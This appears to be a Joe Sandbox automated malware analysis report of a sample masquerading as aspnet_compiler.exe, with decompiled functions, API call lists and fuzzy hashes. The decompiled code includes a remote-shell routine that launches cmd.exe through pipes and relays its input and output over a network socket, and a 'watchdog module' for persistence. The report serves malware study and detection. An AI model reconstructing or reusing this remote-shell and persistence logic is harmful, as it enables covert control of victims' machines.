									__eflags = _t96 - 0x20660;
									if(_t96 == 0x20660) {
										goto L20;
									} else {
										__eflags = _t96 - 0x20670;
										if(_t96 == 0x20670) {
											goto L20;
										} else {
											__eflags = _t96 - 0x30650;
											if(_t96 == 0x30650) {
												goto L20;
											} else {
												__eflags = _t96 - 0x30660;
												if(_t96 == 0x30660) {
													goto L20;
												} else {
													__eflags = _t96 - 0x30670;
													if(_t96 != 0x30670) {
														goto L21;
													} else {
														goto L20;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _v24 - 7;
							_v40 = _v44;
							_t87 = _v48;
							_v16 = _t87;
							_v36 = _t87;
							if(_v24 >= 7) {
								_t93 = 7;
								_push(_t105);
								asm("cpuid");
								_t107 =  &_v56;
								 *_t107 = _t93;
								 *((intOrPtr*)(_t107 + 4)) = _t105;
								 *((intOrPtr*)(_t107 + 8)) = 0;
								 *(_t107 + 0xc) = _t123;
								_t94 = _v52;
								__eflags = _t94 & 0x00000200;
								_v32 = _t94;
								_t87 = _v16;
								if((_t94 & 0x00000200) != 0) {
									_t132 = _t130 | 0x00000002;
									__eflags = _t132;
									 *0x46fd20 = _t132;
								}
							}
							__eflags = _t87 & 0x00100000;
							if((_t87 & 0x00100000) != 0) {
								 *0x46f010 =  *0x46f010 | 0x00000004;
								 *0x46fd1c = 2;
								__eflags = _t87 & 0x08000000;
								if((_t87 & 0x08000000) != 0) {
									__eflags = _t87 & 0x10000000;
									if((_t87 & 0x10000000) != 0) {
										asm("xgetbv");
										_v28 = _t87;
										_v24 = _t123;
										__eflags = (_v28 & 0x00000006) - 6;
										if((_v28 & 0x00000006) == 6) {
											__eflags = 0;
											if(0 == 0) {
												_t90 =  *0x46f010; // 0x2f
												_t91 = _t90 | 0x00000008;
												 *0x46fd1c = 3;
												__eflags = _v32 & 0x00000020;
												 *0x46f010 = _t91;
												if((_v32 & 0x00000020) != 0) {
													_t92 = _t91 | 0x00000020;
													__eflags = _t92;
													 *0x46fd1c = 5;
													 *0x46f010 = _t92;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}











































                0x0040163e
                0x00401644
                0x00401649
                0x0040164e
                0x00401652
                0x00401654
                0x0040165b
                0x00401660
                0x00401665
                0x00401688
                0x00401689
                0x0040168f
                0x00000000
                0x00401667
                0x00401667
                0x0040166d
                0x00000000
                0x0040166f
                0x0040166f
                0x00401672
                0x00401674
                0x00000000
                0x00401676
                0x00401677
                0x0040167d
                0x00401680
                0x00401683
                0x00401691
                0x00401693
                0x00401693
                0x00401674
                0x0040166d
                0x00401656
                0x00401656
                0x00433514
                0x00433516
                0x0043351c
                0x0043352a
                0x0043352f
                0x00433530
                0x00433531
                0x00433539
                0x00433547
                0x0043354c
                0x0043354d
                0x00433550
                0x0043355e
                0x00433566
                0x0043356b
                0x0043356d
                0x00433573
                0x00433579
                0x00433582
                0x00433584
                0x0043358a
                0x0043358d
                0x0043358e
                0x00433592
                0x00433593
                0x00433595
                0x00433598
                0x0043359d
                0x004335a6
                0x004335b7
                0x004335c2
                0x004335c8
                0x004335c9
                0x004335d1
                0x004335d4
                0x004335d7
                0x004335d9
                0x004335dc
                0x004335df
                0x004335e2
                0x00433627
                0x00433627
                0x004335e4
                0x004335e7
                0x004335ec
                0x004335f1
                0x00433616
                0x00433616
                0x0043361c
                0x0043361f
                0x004335f3
                0x004335f3
                0x004335f8
                0x00000000
                0x004335fa
                0x004335fa
                0x004335ff
                0x00000000
                0x00433601
                0x00433601
                0x00433606
                0x00000000
                0x00433608
                0x00433608
                0x0043360d
                0x00000000
                0x0043360f
                0x0043360f
                0x00433614
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00433614
                0x0043360d
                0x00433606
                0x004335ff
                0x004335f8
                0x004335f1
                0x0043362d
                0x00433634
                0x00433637
                0x0043363a
                0x0043363d
                0x00433640
                0x00433644
                0x00433647
                0x00433648
                0x0043364d
                0x00433650
                0x00433652
                0x00433655
                0x00433658
                0x0043365b
                0x0043365e
                0x00433663
                0x00433666
                0x00433669
                0x0043366b
                0x0043366b
                0x0043366e
                0x0043366e
                0x00433669
                0x00433676
                0x0043367b
                0x0043367d
                0x00433684
                0x0043368e
                0x00433693
                0x00433695
                0x0043369a
                0x0043369e
                0x004336a1
                0x004336a4
                0x004336b2
                0x004336b5
                0x004336b7
                0x004336b9
                0x004336bb
                0x004336c0
                0x004336c3
                0x004336cd
                0x004336d1
                0x004336d6
                0x004336d8
                0x004336d8
                0x004336db
                0x004336e5
                0x004336e5
                0x004336d6
                0x004336b9
                0x004336b5
                0x0043369a
                0x00433693
                0x0043367b
                0x004336ea
                0x004336f0
                0x004336f0
                0x00401646
                0x00401648
                0x00401648

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                • Instruction ID: bcf894cbe7f558628445d92d8d60389314e0f69a1dd629ba4e5ad944aee8928b
                • Opcode Fuzzy Hash: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                • Instruction Fuzzy Hash: 73F027B02042016BCB1C9B34CD5062A37969B98356F248F3FF01BD61E0DB3ACC85C60D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00414230 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E00414230(void* __ecx, void* __edx) {
				intOrPtr* _t1;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t8;

				_t1 =  *0x474a84;
				_t7 = __edx;
				_t6 = __ecx;
				if(_t1 == 0) {
					_t1 = E004140CD();
					 *0x474a84 = _t1;
				}
				_t2 =  *_t1(_t6, _t7, 0, 0x470adc); // executed
				_t8 = _t2;
				__imp__#112(_t8);
				return _t8;
			}








                0x00414230
                0x00414236
                0x00414239
                0x0041423d
                0x0041423f
                0x00414244
                0x00414244
                0x00414252
                0x00414254
                0x00414257
                0x00414261

                APIs
                • getaddrinfo.WS2_32(00000000,00000000,00000000,00470ADC,00473298,00000000,004144CF,00000000,00000001), ref: 00414252
                • WSASetLastError.WS2_32(00000000), ref: 00414257
                  • Part of subcall function 004140CD: GetSystemDirectoryA.KERNEL32 ref: 0041411C
                  • Part of subcall function 004140CD: LoadLibraryA.KERNEL32(?), ref: 0041415E
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                  • Part of subcall function 004140CD: FreeLibrary.KERNEL32(00000000), ref: 00414185
                  • Part of subcall function 004140CD: LoadLibraryA.KERNEL32(?), ref: 004141BD
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                  • Part of subcall function 004140CD: FreeLibrary.KERNEL32(00000000), ref: 004141D6
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                • String ID:
                • API String ID: 1170566393-0
                • Opcode ID: 7eafb68998cab0a5018a28c9e38df1f5118c42bd2d226191dbc603db142c33c4
                • Instruction ID: 70d6a2cd6ec79b2462febf626053ae861496eecd2af2d304739a3cfd275dbb53
                • Opcode Fuzzy Hash: 7eafb68998cab0a5018a28c9e38df1f5118c42bd2d226191dbc603db142c33c4
                • Instruction Fuzzy Hash: 6ED012322411216ED2116769AC01AB7AB9CDFD6770B054077B504D3611D7A44C4146AC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044E954 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 91%
                			E0044E954(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E004443F4(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E00447304(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E00445002(0);
				return _t31;
			}













                0x0044e959
                0x0044e95a
                0x0044e961
                0x0044e966
                0x0044e96a
                0x0044e96e
                0x0044e971
                0x0044e977
                0x0044e977
                0x0044e97d
                0x0044e97f
                0x0044e982
                0x0044e982
                0x0044e985
                0x0044e987
                0x0044e98d
                0x0044e991
                0x0044e996
                0x0044e99a
                0x0044e99c
                0x0044e99f
                0x0044e9a5
                0x0044e9ac
                0x0044e9b0
                0x0044e9b4
                0x0044e9b7
                0x0044e9b7
                0x0044e9bb
                0x0044e9be
                0x0044e973
                0x0044e973
                0x0044e973
                0x0044e9c0
                0x0044e9cd

                APIs
                  • Part of subcall function 004443F4: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                • _free.LIBCMT ref: 0044E9C0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                • Instruction ID: b43b9af27dcddb4849891f15c6ca459ff88ab6a8378577c786593469fbe10df3
                • Opcode Fuzzy Hash: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                • Instruction Fuzzy Hash: E201D6B22003456BF721CE6AD845D5AFBD9FB85374F25051EE584832C0EA34A906C678
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004443F4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 95%
                			E004443F4(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x470a5c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00443E46();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0043EEAD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00441850(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                0x004443f4
                0x004443fa
                0x004443ff
                0x0044440d
                0x0044440d
                0x00444413
                0x00444415
                0x00444415
                0x0044442c
                0x00444435
                0x0044443d
                0x00000000
                0x00000000
                0x0044441d
                0x0044441f
                0x00444441
                0x00444446
                0x0044444c
                0x00000000
                0x0044444c
                0x00444422
                0x00444427
                0x00444428
                0x0044442a
                0x00000000
                0x00000000
                0x0044442a
                0x00000000
                0x0044442c
                0x00444405
                0x0044440b
                0x00000000
                0x00000000
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                • Instruction ID: 9d40b9d846304a4da4b5929be8e6dfedca74db581f7d738e17eab2e9df3cce7a
                • Opcode Fuzzy Hash: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                • Instruction Fuzzy Hash: 14F0E931605234A6FB211E629C06B5B7748AFC17B5F148027FC09A7690CA28DC0186ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                Download Yara Rule
                APIs
                • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                • Instruction ID: e98c7a7dcee344fb28133bcb2ee241acd4b45dcbdfc1a3ef5d864df1fc63b674
                • Opcode Fuzzy Hash: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                • Instruction Fuzzy Hash: 7ED012325AD7088EE610AAB8AD0F8A47B5CC313A15F0003BA6CB9835D3F640571CC2AB
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004255D3 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                • Instruction ID: bfab3a08044aaf07d4c990dee58e7a6731fa9f306c9d2c0144e000b13adf200d
                • Opcode Fuzzy Hash: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                • Instruction Fuzzy Hash: 56B092B9108302BFCA160B60DC0887A7EA6ABC8385B00882CF146411B0C636C460AB26
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0040567A Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 278pipesleepfileCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E0040567A() {
				char _v4;
				void* _v16;
				char _v28;
				char _v52;
				long _v56;
				long _v60;
				CHAR* _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				CHAR* _v84;
				long _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				CHAR* _t97;
				void* _t105;
				intOrPtr _t135;
				signed int _t138;
				signed int _t139;
				long _t141;
				char* _t143;
				void* _t149;
				void* _t155;
				void* _t161;
				void* _t168;

				_t149 =  &_v68;
				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
				_t139 = _t138 | 0xffffffff;
				_t97 = 0;
				if( *0x474c10 >  *((intOrPtr*)(_t135 + 4))) {
					E00432CF1(0x474c10);
					_t152 =  *0x474c10 - _t139;
					if( *0x474c10 == _t139) {
						E004046D7(0x474b70, 0x474c10, 0);
						E0043307B(_t152, E00456897);
						E00432CB2(_t139, 0x474c10);
					}
				}
				if( *0x474bf0 >  *((intOrPtr*)(_t135 + 4))) {
					E00432CF1(0x474bf0);
					_t154 =  *0x474bf0 - _t139;
					if( *0x474bf0 == _t139) {
						E004020BF(_t97, 0x474c18);
						E0043307B(_t154, E0045688D);
						E00432CB2(_t139, 0x474bf0);
					}
				}
				_t98 =  &_v52;
				E004020BF(_t97,  &_v52);
				_t143 = 0x472f78;
				_t136 = CloseHandle;
				_v64 = _t97;
				_t155 =  *0x470ae6 - _t97; // 0x0
				if(_t155 != 0) {
					L12:
					_v60 = _t97;
					PeekNamedPipe( *0x474bf8, _t97, _t97, _t97,  &_v60, _t97);
					if(_v60 <= _t97) {
						_t149 = _t149 - 0x18;
						E00402073(_t97, _t149, _t134, _t143, 0x464074);
						_push(0x62);
						_t139 = E00404A81(0x474b70, _t134, __eflags);
						goto L21;
					}
					_push(_v60);
					_t56 = E0043A620(_t98);
					_t144 = _t56;
					ReadFile( *0x474bf8, _t56, _v60,  &_v56, _t97);
					if(_v56 <= _t97) {
						L19:
						L0043A61B(_t144);
						_t143 = 0x472f78;
						goto L21;
					}
					if(_v64 <= _t97) {
						L17:
						E00402073(_t97,  &_v28, _t134, _t144, _t144);
						_t149 = _t149 - 0x18;
						_t105 = _t149;
						_push(_v60);
						_push(_t97);
						L18:
						E00405A8B(_t97, _t105, _t134, _t144, _t165);
						_t139 = E00404A81(0x474b70, _t134, _t165, 0x62,  &_v28);
						E00401FB8();
						goto L19;
					}
					_t66 = E0043A630(_t144, E00401F8B( &_v52), _v64);
					_t149 = _t149 + 0xc;
					_t165 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402073(_t97,  &_v28, _t134, _t144, _t144);
					_t149 = _t149 - 0x18;
					_t105 = _t149;
					_push(_v60 - _v68);
					_push(_v68);
					goto L18;
				} else {
					_t134 = "cmd.exe";
					_t98 = 0x472f78;
					_t70 = E00405AE5("cmd.exe");
					_t156 = _t70;
					if(_t70 == 0) {
						L11:
						_t161 =  *0x470ae6 - _t97; // 0x0
						if(_t161 == 0) {
							L26:
							E00404E06(_t134);
							CloseHandle( *0x474bf8);
							CloseHandle( *0x474c14);
							 *0x470ae6 = _t97;
							_t97 = 1;
							L27:
							E00401FB8();
							E00401FB8();
							return _t97;
						} else {
							goto L12;
						}
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
							_t98 = _t143;
							 *0x470ae7 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
							if(E0040245C() == 0) {
								_v84 = _t97;
							} else {
								L0040535D(_t97, _t143, _t134, _t136, _t143, "\n");
								E00401FA0( &_v76, _t143);
								_t52 = E0040245C();
								WriteFile( *0x474bf4, E00401F8B(_t143), _t52,  &_v92, _t97);
								_t98 = _t143;
								L00405A86(_t97, _t143, _t134, 0x464074);
							}
							Sleep(0x64);
							_t168 =  *0x470ae7 - _t97; // 0x0
						} while (_t168 != 0);
						TerminateProcess(0x474bfc->hProcess, _t97);
						CloseHandle( *0x474c00);
						CloseHandle( *0x474bfc);
						goto L26;
					}
					L00405A86(_t97, 0x474c18, "cmd.exe", E0043A9AA(_t97, _t156, "SystemDrive"));
					L0040535D(_t97, 0x474c18, "cmd.exe", CloseHandle, 0x474c18, "\\");
					0x474b18->nLength = 0xc;
					 *0x474b20 = 1;
					 *0x474b1c = _t97;
					if(CreatePipe(0x474c0c, 0x474bf4, 0x474b18, _t97) == 0 || CreatePipe(0x474bf8, 0x474c14, 0x474b18, _t97) == 0) {
						goto L27;
					} else {
						_t141 = 0x44;
						E00435760(CloseHandle, 0x474b28, _t97, CreatePipe);
						0x474b28->cb = _t141;
						 *0x474b54 = 0x101;
						 *0x474b58 = 0;
						 *0x474b60 =  *0x474c0c;
						_t79 =  *0x474c14;
						 *0x474b64 = _t79;
						 *0x474b68 = _t79;
						_t80 = E00401F8B(0x474c18);
						_t143 = 0x472f78;
						 *0x470ae6 = CreateProcessA(_t97, E00401F8B(0x472f78), _t97, _t97, 1, _t97, _t97, _t80, 0x474b28, 0x474bfc) != 0;
						L00405A86(_t97, 0x472f78, _t134, 0x464074);
						 *0x470ae7 = 1;
						E0040480D(0x474b70);
						E004048A8(0x474b70, 0x474b70, 0x474b70);
						_t149 = _t149 + 0xc - 0x18;
						E004020D6(_t97, _t149, _t134,  *0x470ae6,  &_v4);
						_push(0x93);
						_t98 = 0x474b70;
						_t139 = E00404A81(0x474b70, _t134,  *0x470ae6);
						Sleep(0x12c);
						goto L11;
					}
				}
			}




































                0x00405680
                0x00405687
                0x00405689
                0x00405691
                0x00405699
                0x004056a1
                0x004056a7
                0x004056ad
                0x004056b5
                0x004056bf
                0x004056c6
                0x004056cb
                0x004056ad
                0x004056d7
                0x004056df
                0x004056e5
                0x004056eb
                0x004056f2
                0x004056fc
                0x00405703
                0x00405708
                0x004056eb
                0x00405709
                0x0040570d
                0x00405712
                0x00405717
                0x0040571d
                0x00405721
                0x00405727
                0x00405889
                0x0040588e
                0x0040589c
                0x004058a6
                0x00405957
                0x00405961
                0x00405966
                0x00405972
                0x00000000
                0x00405972
                0x004058ac
                0x004058b0
                0x004058b7
                0x004058c9
                0x004058d3
                0x00405949
                0x0040594a
                0x00405950
                0x00000000
                0x00405950
                0x004058d9
                0x00405914
                0x00405919
                0x0040591e
                0x00405921
                0x00405923
                0x00405927
                0x00405928
                0x0040592d
                0x00405942
                0x00405944
                0x00000000
                0x00405944
                0x004058ea
                0x004058ef
                0x004058f2
                0x004058f4
                0x00000000
                0x00000000
                0x004058fb
                0x00405908
                0x0040590b
                0x0040590d
                0x0040590e
                0x00000000
                0x0040572d
                0x0040572d
                0x00405732
                0x00405734
                0x00405739
                0x0040573b
                0x0040587d
                0x0040587d
                0x00405883
                0x00405a0d
                0x00405a12
                0x00405a1d
                0x00405a25
                0x00405a27
                0x00405a2d
                0x00405a2f
                0x00405a33
                0x00405a3c
                0x00405a4a
                0x00000000
                0x00000000
                0x00000000
                0x00405889
                0x00000000
                0x00405974
                0x0040597f
                0x00405982
                0x00405984
                0x00405990
                0x004059d8
                0x00405992
                0x00405999
                0x004059a3
                0x004059b0
                0x004059c4
                0x004059cf
                0x004059d1
                0x004059d1
                0x004059de
                0x004059e4
                0x004059e4
                0x004059f7
                0x00405a03
                0x00405a0b
                0x00000000
                0x00405a0b
                0x00405754
                0x00405760
                0x0040577c
                0x00405786
                0x00405790
                0x0040579a
                0x00000000
                0x004057b6
                0x004057b8
                0x004057c1
                0x004057c9
                0x004057d1
                0x004057db
                0x004057f0
                0x004057f5
                0x004057fb
                0x00405800
                0x00405805
                0x00405810
                0x0040582e
                0x00405835
                0x0040583f
                0x00405848
                0x00405850
                0x00405855
                0x0040585f
                0x00405864
                0x00405869
                0x00405875
                0x00405877
                0x00000000
                0x00405877
                0x0040579a

                APIs
                • __Init_thread_footer.LIBCMT ref: 004056C6
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • __Init_thread_footer.LIBCMT ref: 00405703
                • CreatePipe.KERNEL32(00474C0C,00474BF4,00474B18,00000000,0046408C,00000000), ref: 00405796
                • CreatePipe.KERNEL32(00474BF8,00474C14,00474B18,00000000), ref: 004057AC
                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00474B28,00474BFC), ref: 0040581F
                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00472F78,00464090,00000062,00464074), ref: 004059C4
                • Sleep.KERNEL32(00000064,00000062,00464074), ref: 004059DE
                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                • CloseHandle.KERNEL32 ref: 00405A03
                • CloseHandle.KERNEL32 ref: 00405A0B
                • CloseHandle.KERNEL32 ref: 00405A1D
                • CloseHandle.KERNEL32 ref: 00405A25
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                • String ID: (KG$SystemDrive$cmd.exe$pKG$pKG$pKG$pKG$pKG$x/G$x/G$x/G
                • API String ID: 2994406822-2676871211
                • Opcode ID: b228bb706cc0c523eab5acf379925d2fae165f293d7f99620159bbe8c345fd27
                • Instruction ID: 3b714476e132253386e4612caa6ffda136c57d83f36fbb8ab3cb78f76cc16c3c
                • Opcode Fuzzy Hash: b228bb706cc0c523eab5acf379925d2fae165f293d7f99620159bbe8c345fd27
                • Instruction Fuzzy Hash: AD91C371644205EFC700BB65AD52E7F36A8EB84344F01453FF949A72E2DB789C848B6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041163A Relevance: 37.0, APIs: 7, Strings: 14, Instructions: 238threadCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E0041163A(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				void* _v84;
				char _v100;
				char _v108;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				long _v144;
				char _v148;
				char _v156;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t41;
				CHAR* _t44;
				void* _t45;
				void* _t51;
				void* _t72;
				intOrPtr _t83;
				void* _t84;
				void* _t92;
				void* _t93;
				void* _t110;
				long _t158;
				int _t184;
				long _t186;
				void* _t187;
				char* _t189;
				void* _t190;
				void* _t192;
				signed int _t193;
				void* _t195;
				void* _t202;

				_t195 = (_t193 & 0xfffffff8) - 0x8c;
				_push(_t187);
				_t41 = GetCurrentProcessId();
				_t178 = E00401F8B(0x473238);
				if(E00412B5F(0x473238, _t42, "WD", _t41) != 0) {
					_t44 = E00401F8B(0x473370);
					_t184 = 0;
					_t45 = OpenMutexA(0x100000, 0, _t44);
					__eflags = _t45;
					if(_t45 == 0) {
						E004020BF(0x473238,  &_v76);
						E00401EE4(0x473220);
						E0041ADFE( &_v76);
						E00401F66(0x473238,  &_v100);
						__eflags = E0041AB12( &_v100);
						if(__eflags != 0) {
							_t51 = E0040415E(0x473238,  &_v124,  &_v76, _t192, L"\\SysWOW64\\");
							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v124, __eflags, L"WinDir"));
							E00401EF3( &_v108, _t53, _t187, E00402F85( &_v36, _t53, _t51));
							E00401EE9();
							E00401EE9();
						} else {
							_t93 = E0040415E(0x473238,  &_v28,  &_v76, _t192, L"\\system32\\");
							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v28, __eflags, L"WinDir"));
							E00401EF3( &_v108, _t95, _t187, E00402F85( &_v132, _t95, _t93));
							E00401EE9();
							E00401EE9();
						}
						E00401EE9();
						E0040BEC3( &_v136);
						E0040415E(0x473238,  &_v124, _t180, _t192, L"svchost.exe");
						E00411DC0(0x473238,  &_v140, _t192, __eflags,  &_v128);
						E00401EE9();
						E0040415E(0x473238,  &_v132, _t180, _t192, L"rmclient.exe");
						E00411DC0(0x473238,  &_v148, _t192, __eflags,  &_v136);
						E00401EE9();
						E0040415E(0x473238,  &_v140, _t180, _t192, L"fsutil.exe");
						E00411DC0(0x473238,  &_v156, _t192, __eflags,  &_v144);
						E00401EE9();
						_t72 = E004021DA( &_v160);
						__eflags = _t72;
						if(_t72 != 0) {
							while(1) {
								_push(0x470d64);
								_t189 = E00401F8B( &_v76);
								_t83 = E00401EE4(E00401E45( &_v136, _t180, _t192, __eflags, _t184));
								_t180 = _t189;
								_t84 = E00416FDD(_t83, _t189);
								__eflags = _t84;
								if(_t84 != 0) {
									break;
								}
								_t184 = _t184 + 1;
								_t92 = E004021DA( &_v136);
								__eflags = _t184 - _t92;
								if(_t184 < _t92) {
									continue;
								}
								goto L11;
							}
							E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog module activated");
							E00402073(0x473238, _t195, _t180, _t192, "i");
							E0041A04A(0x473238, _t184);
							Sleep(0x7d0);
							_t158 =  *0x470d6c; // 0x0
							goto L15;
						}
						L11:
						E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog launch failed!");
						E00402073(0x473238, _t195, _t180, _t192, "E");
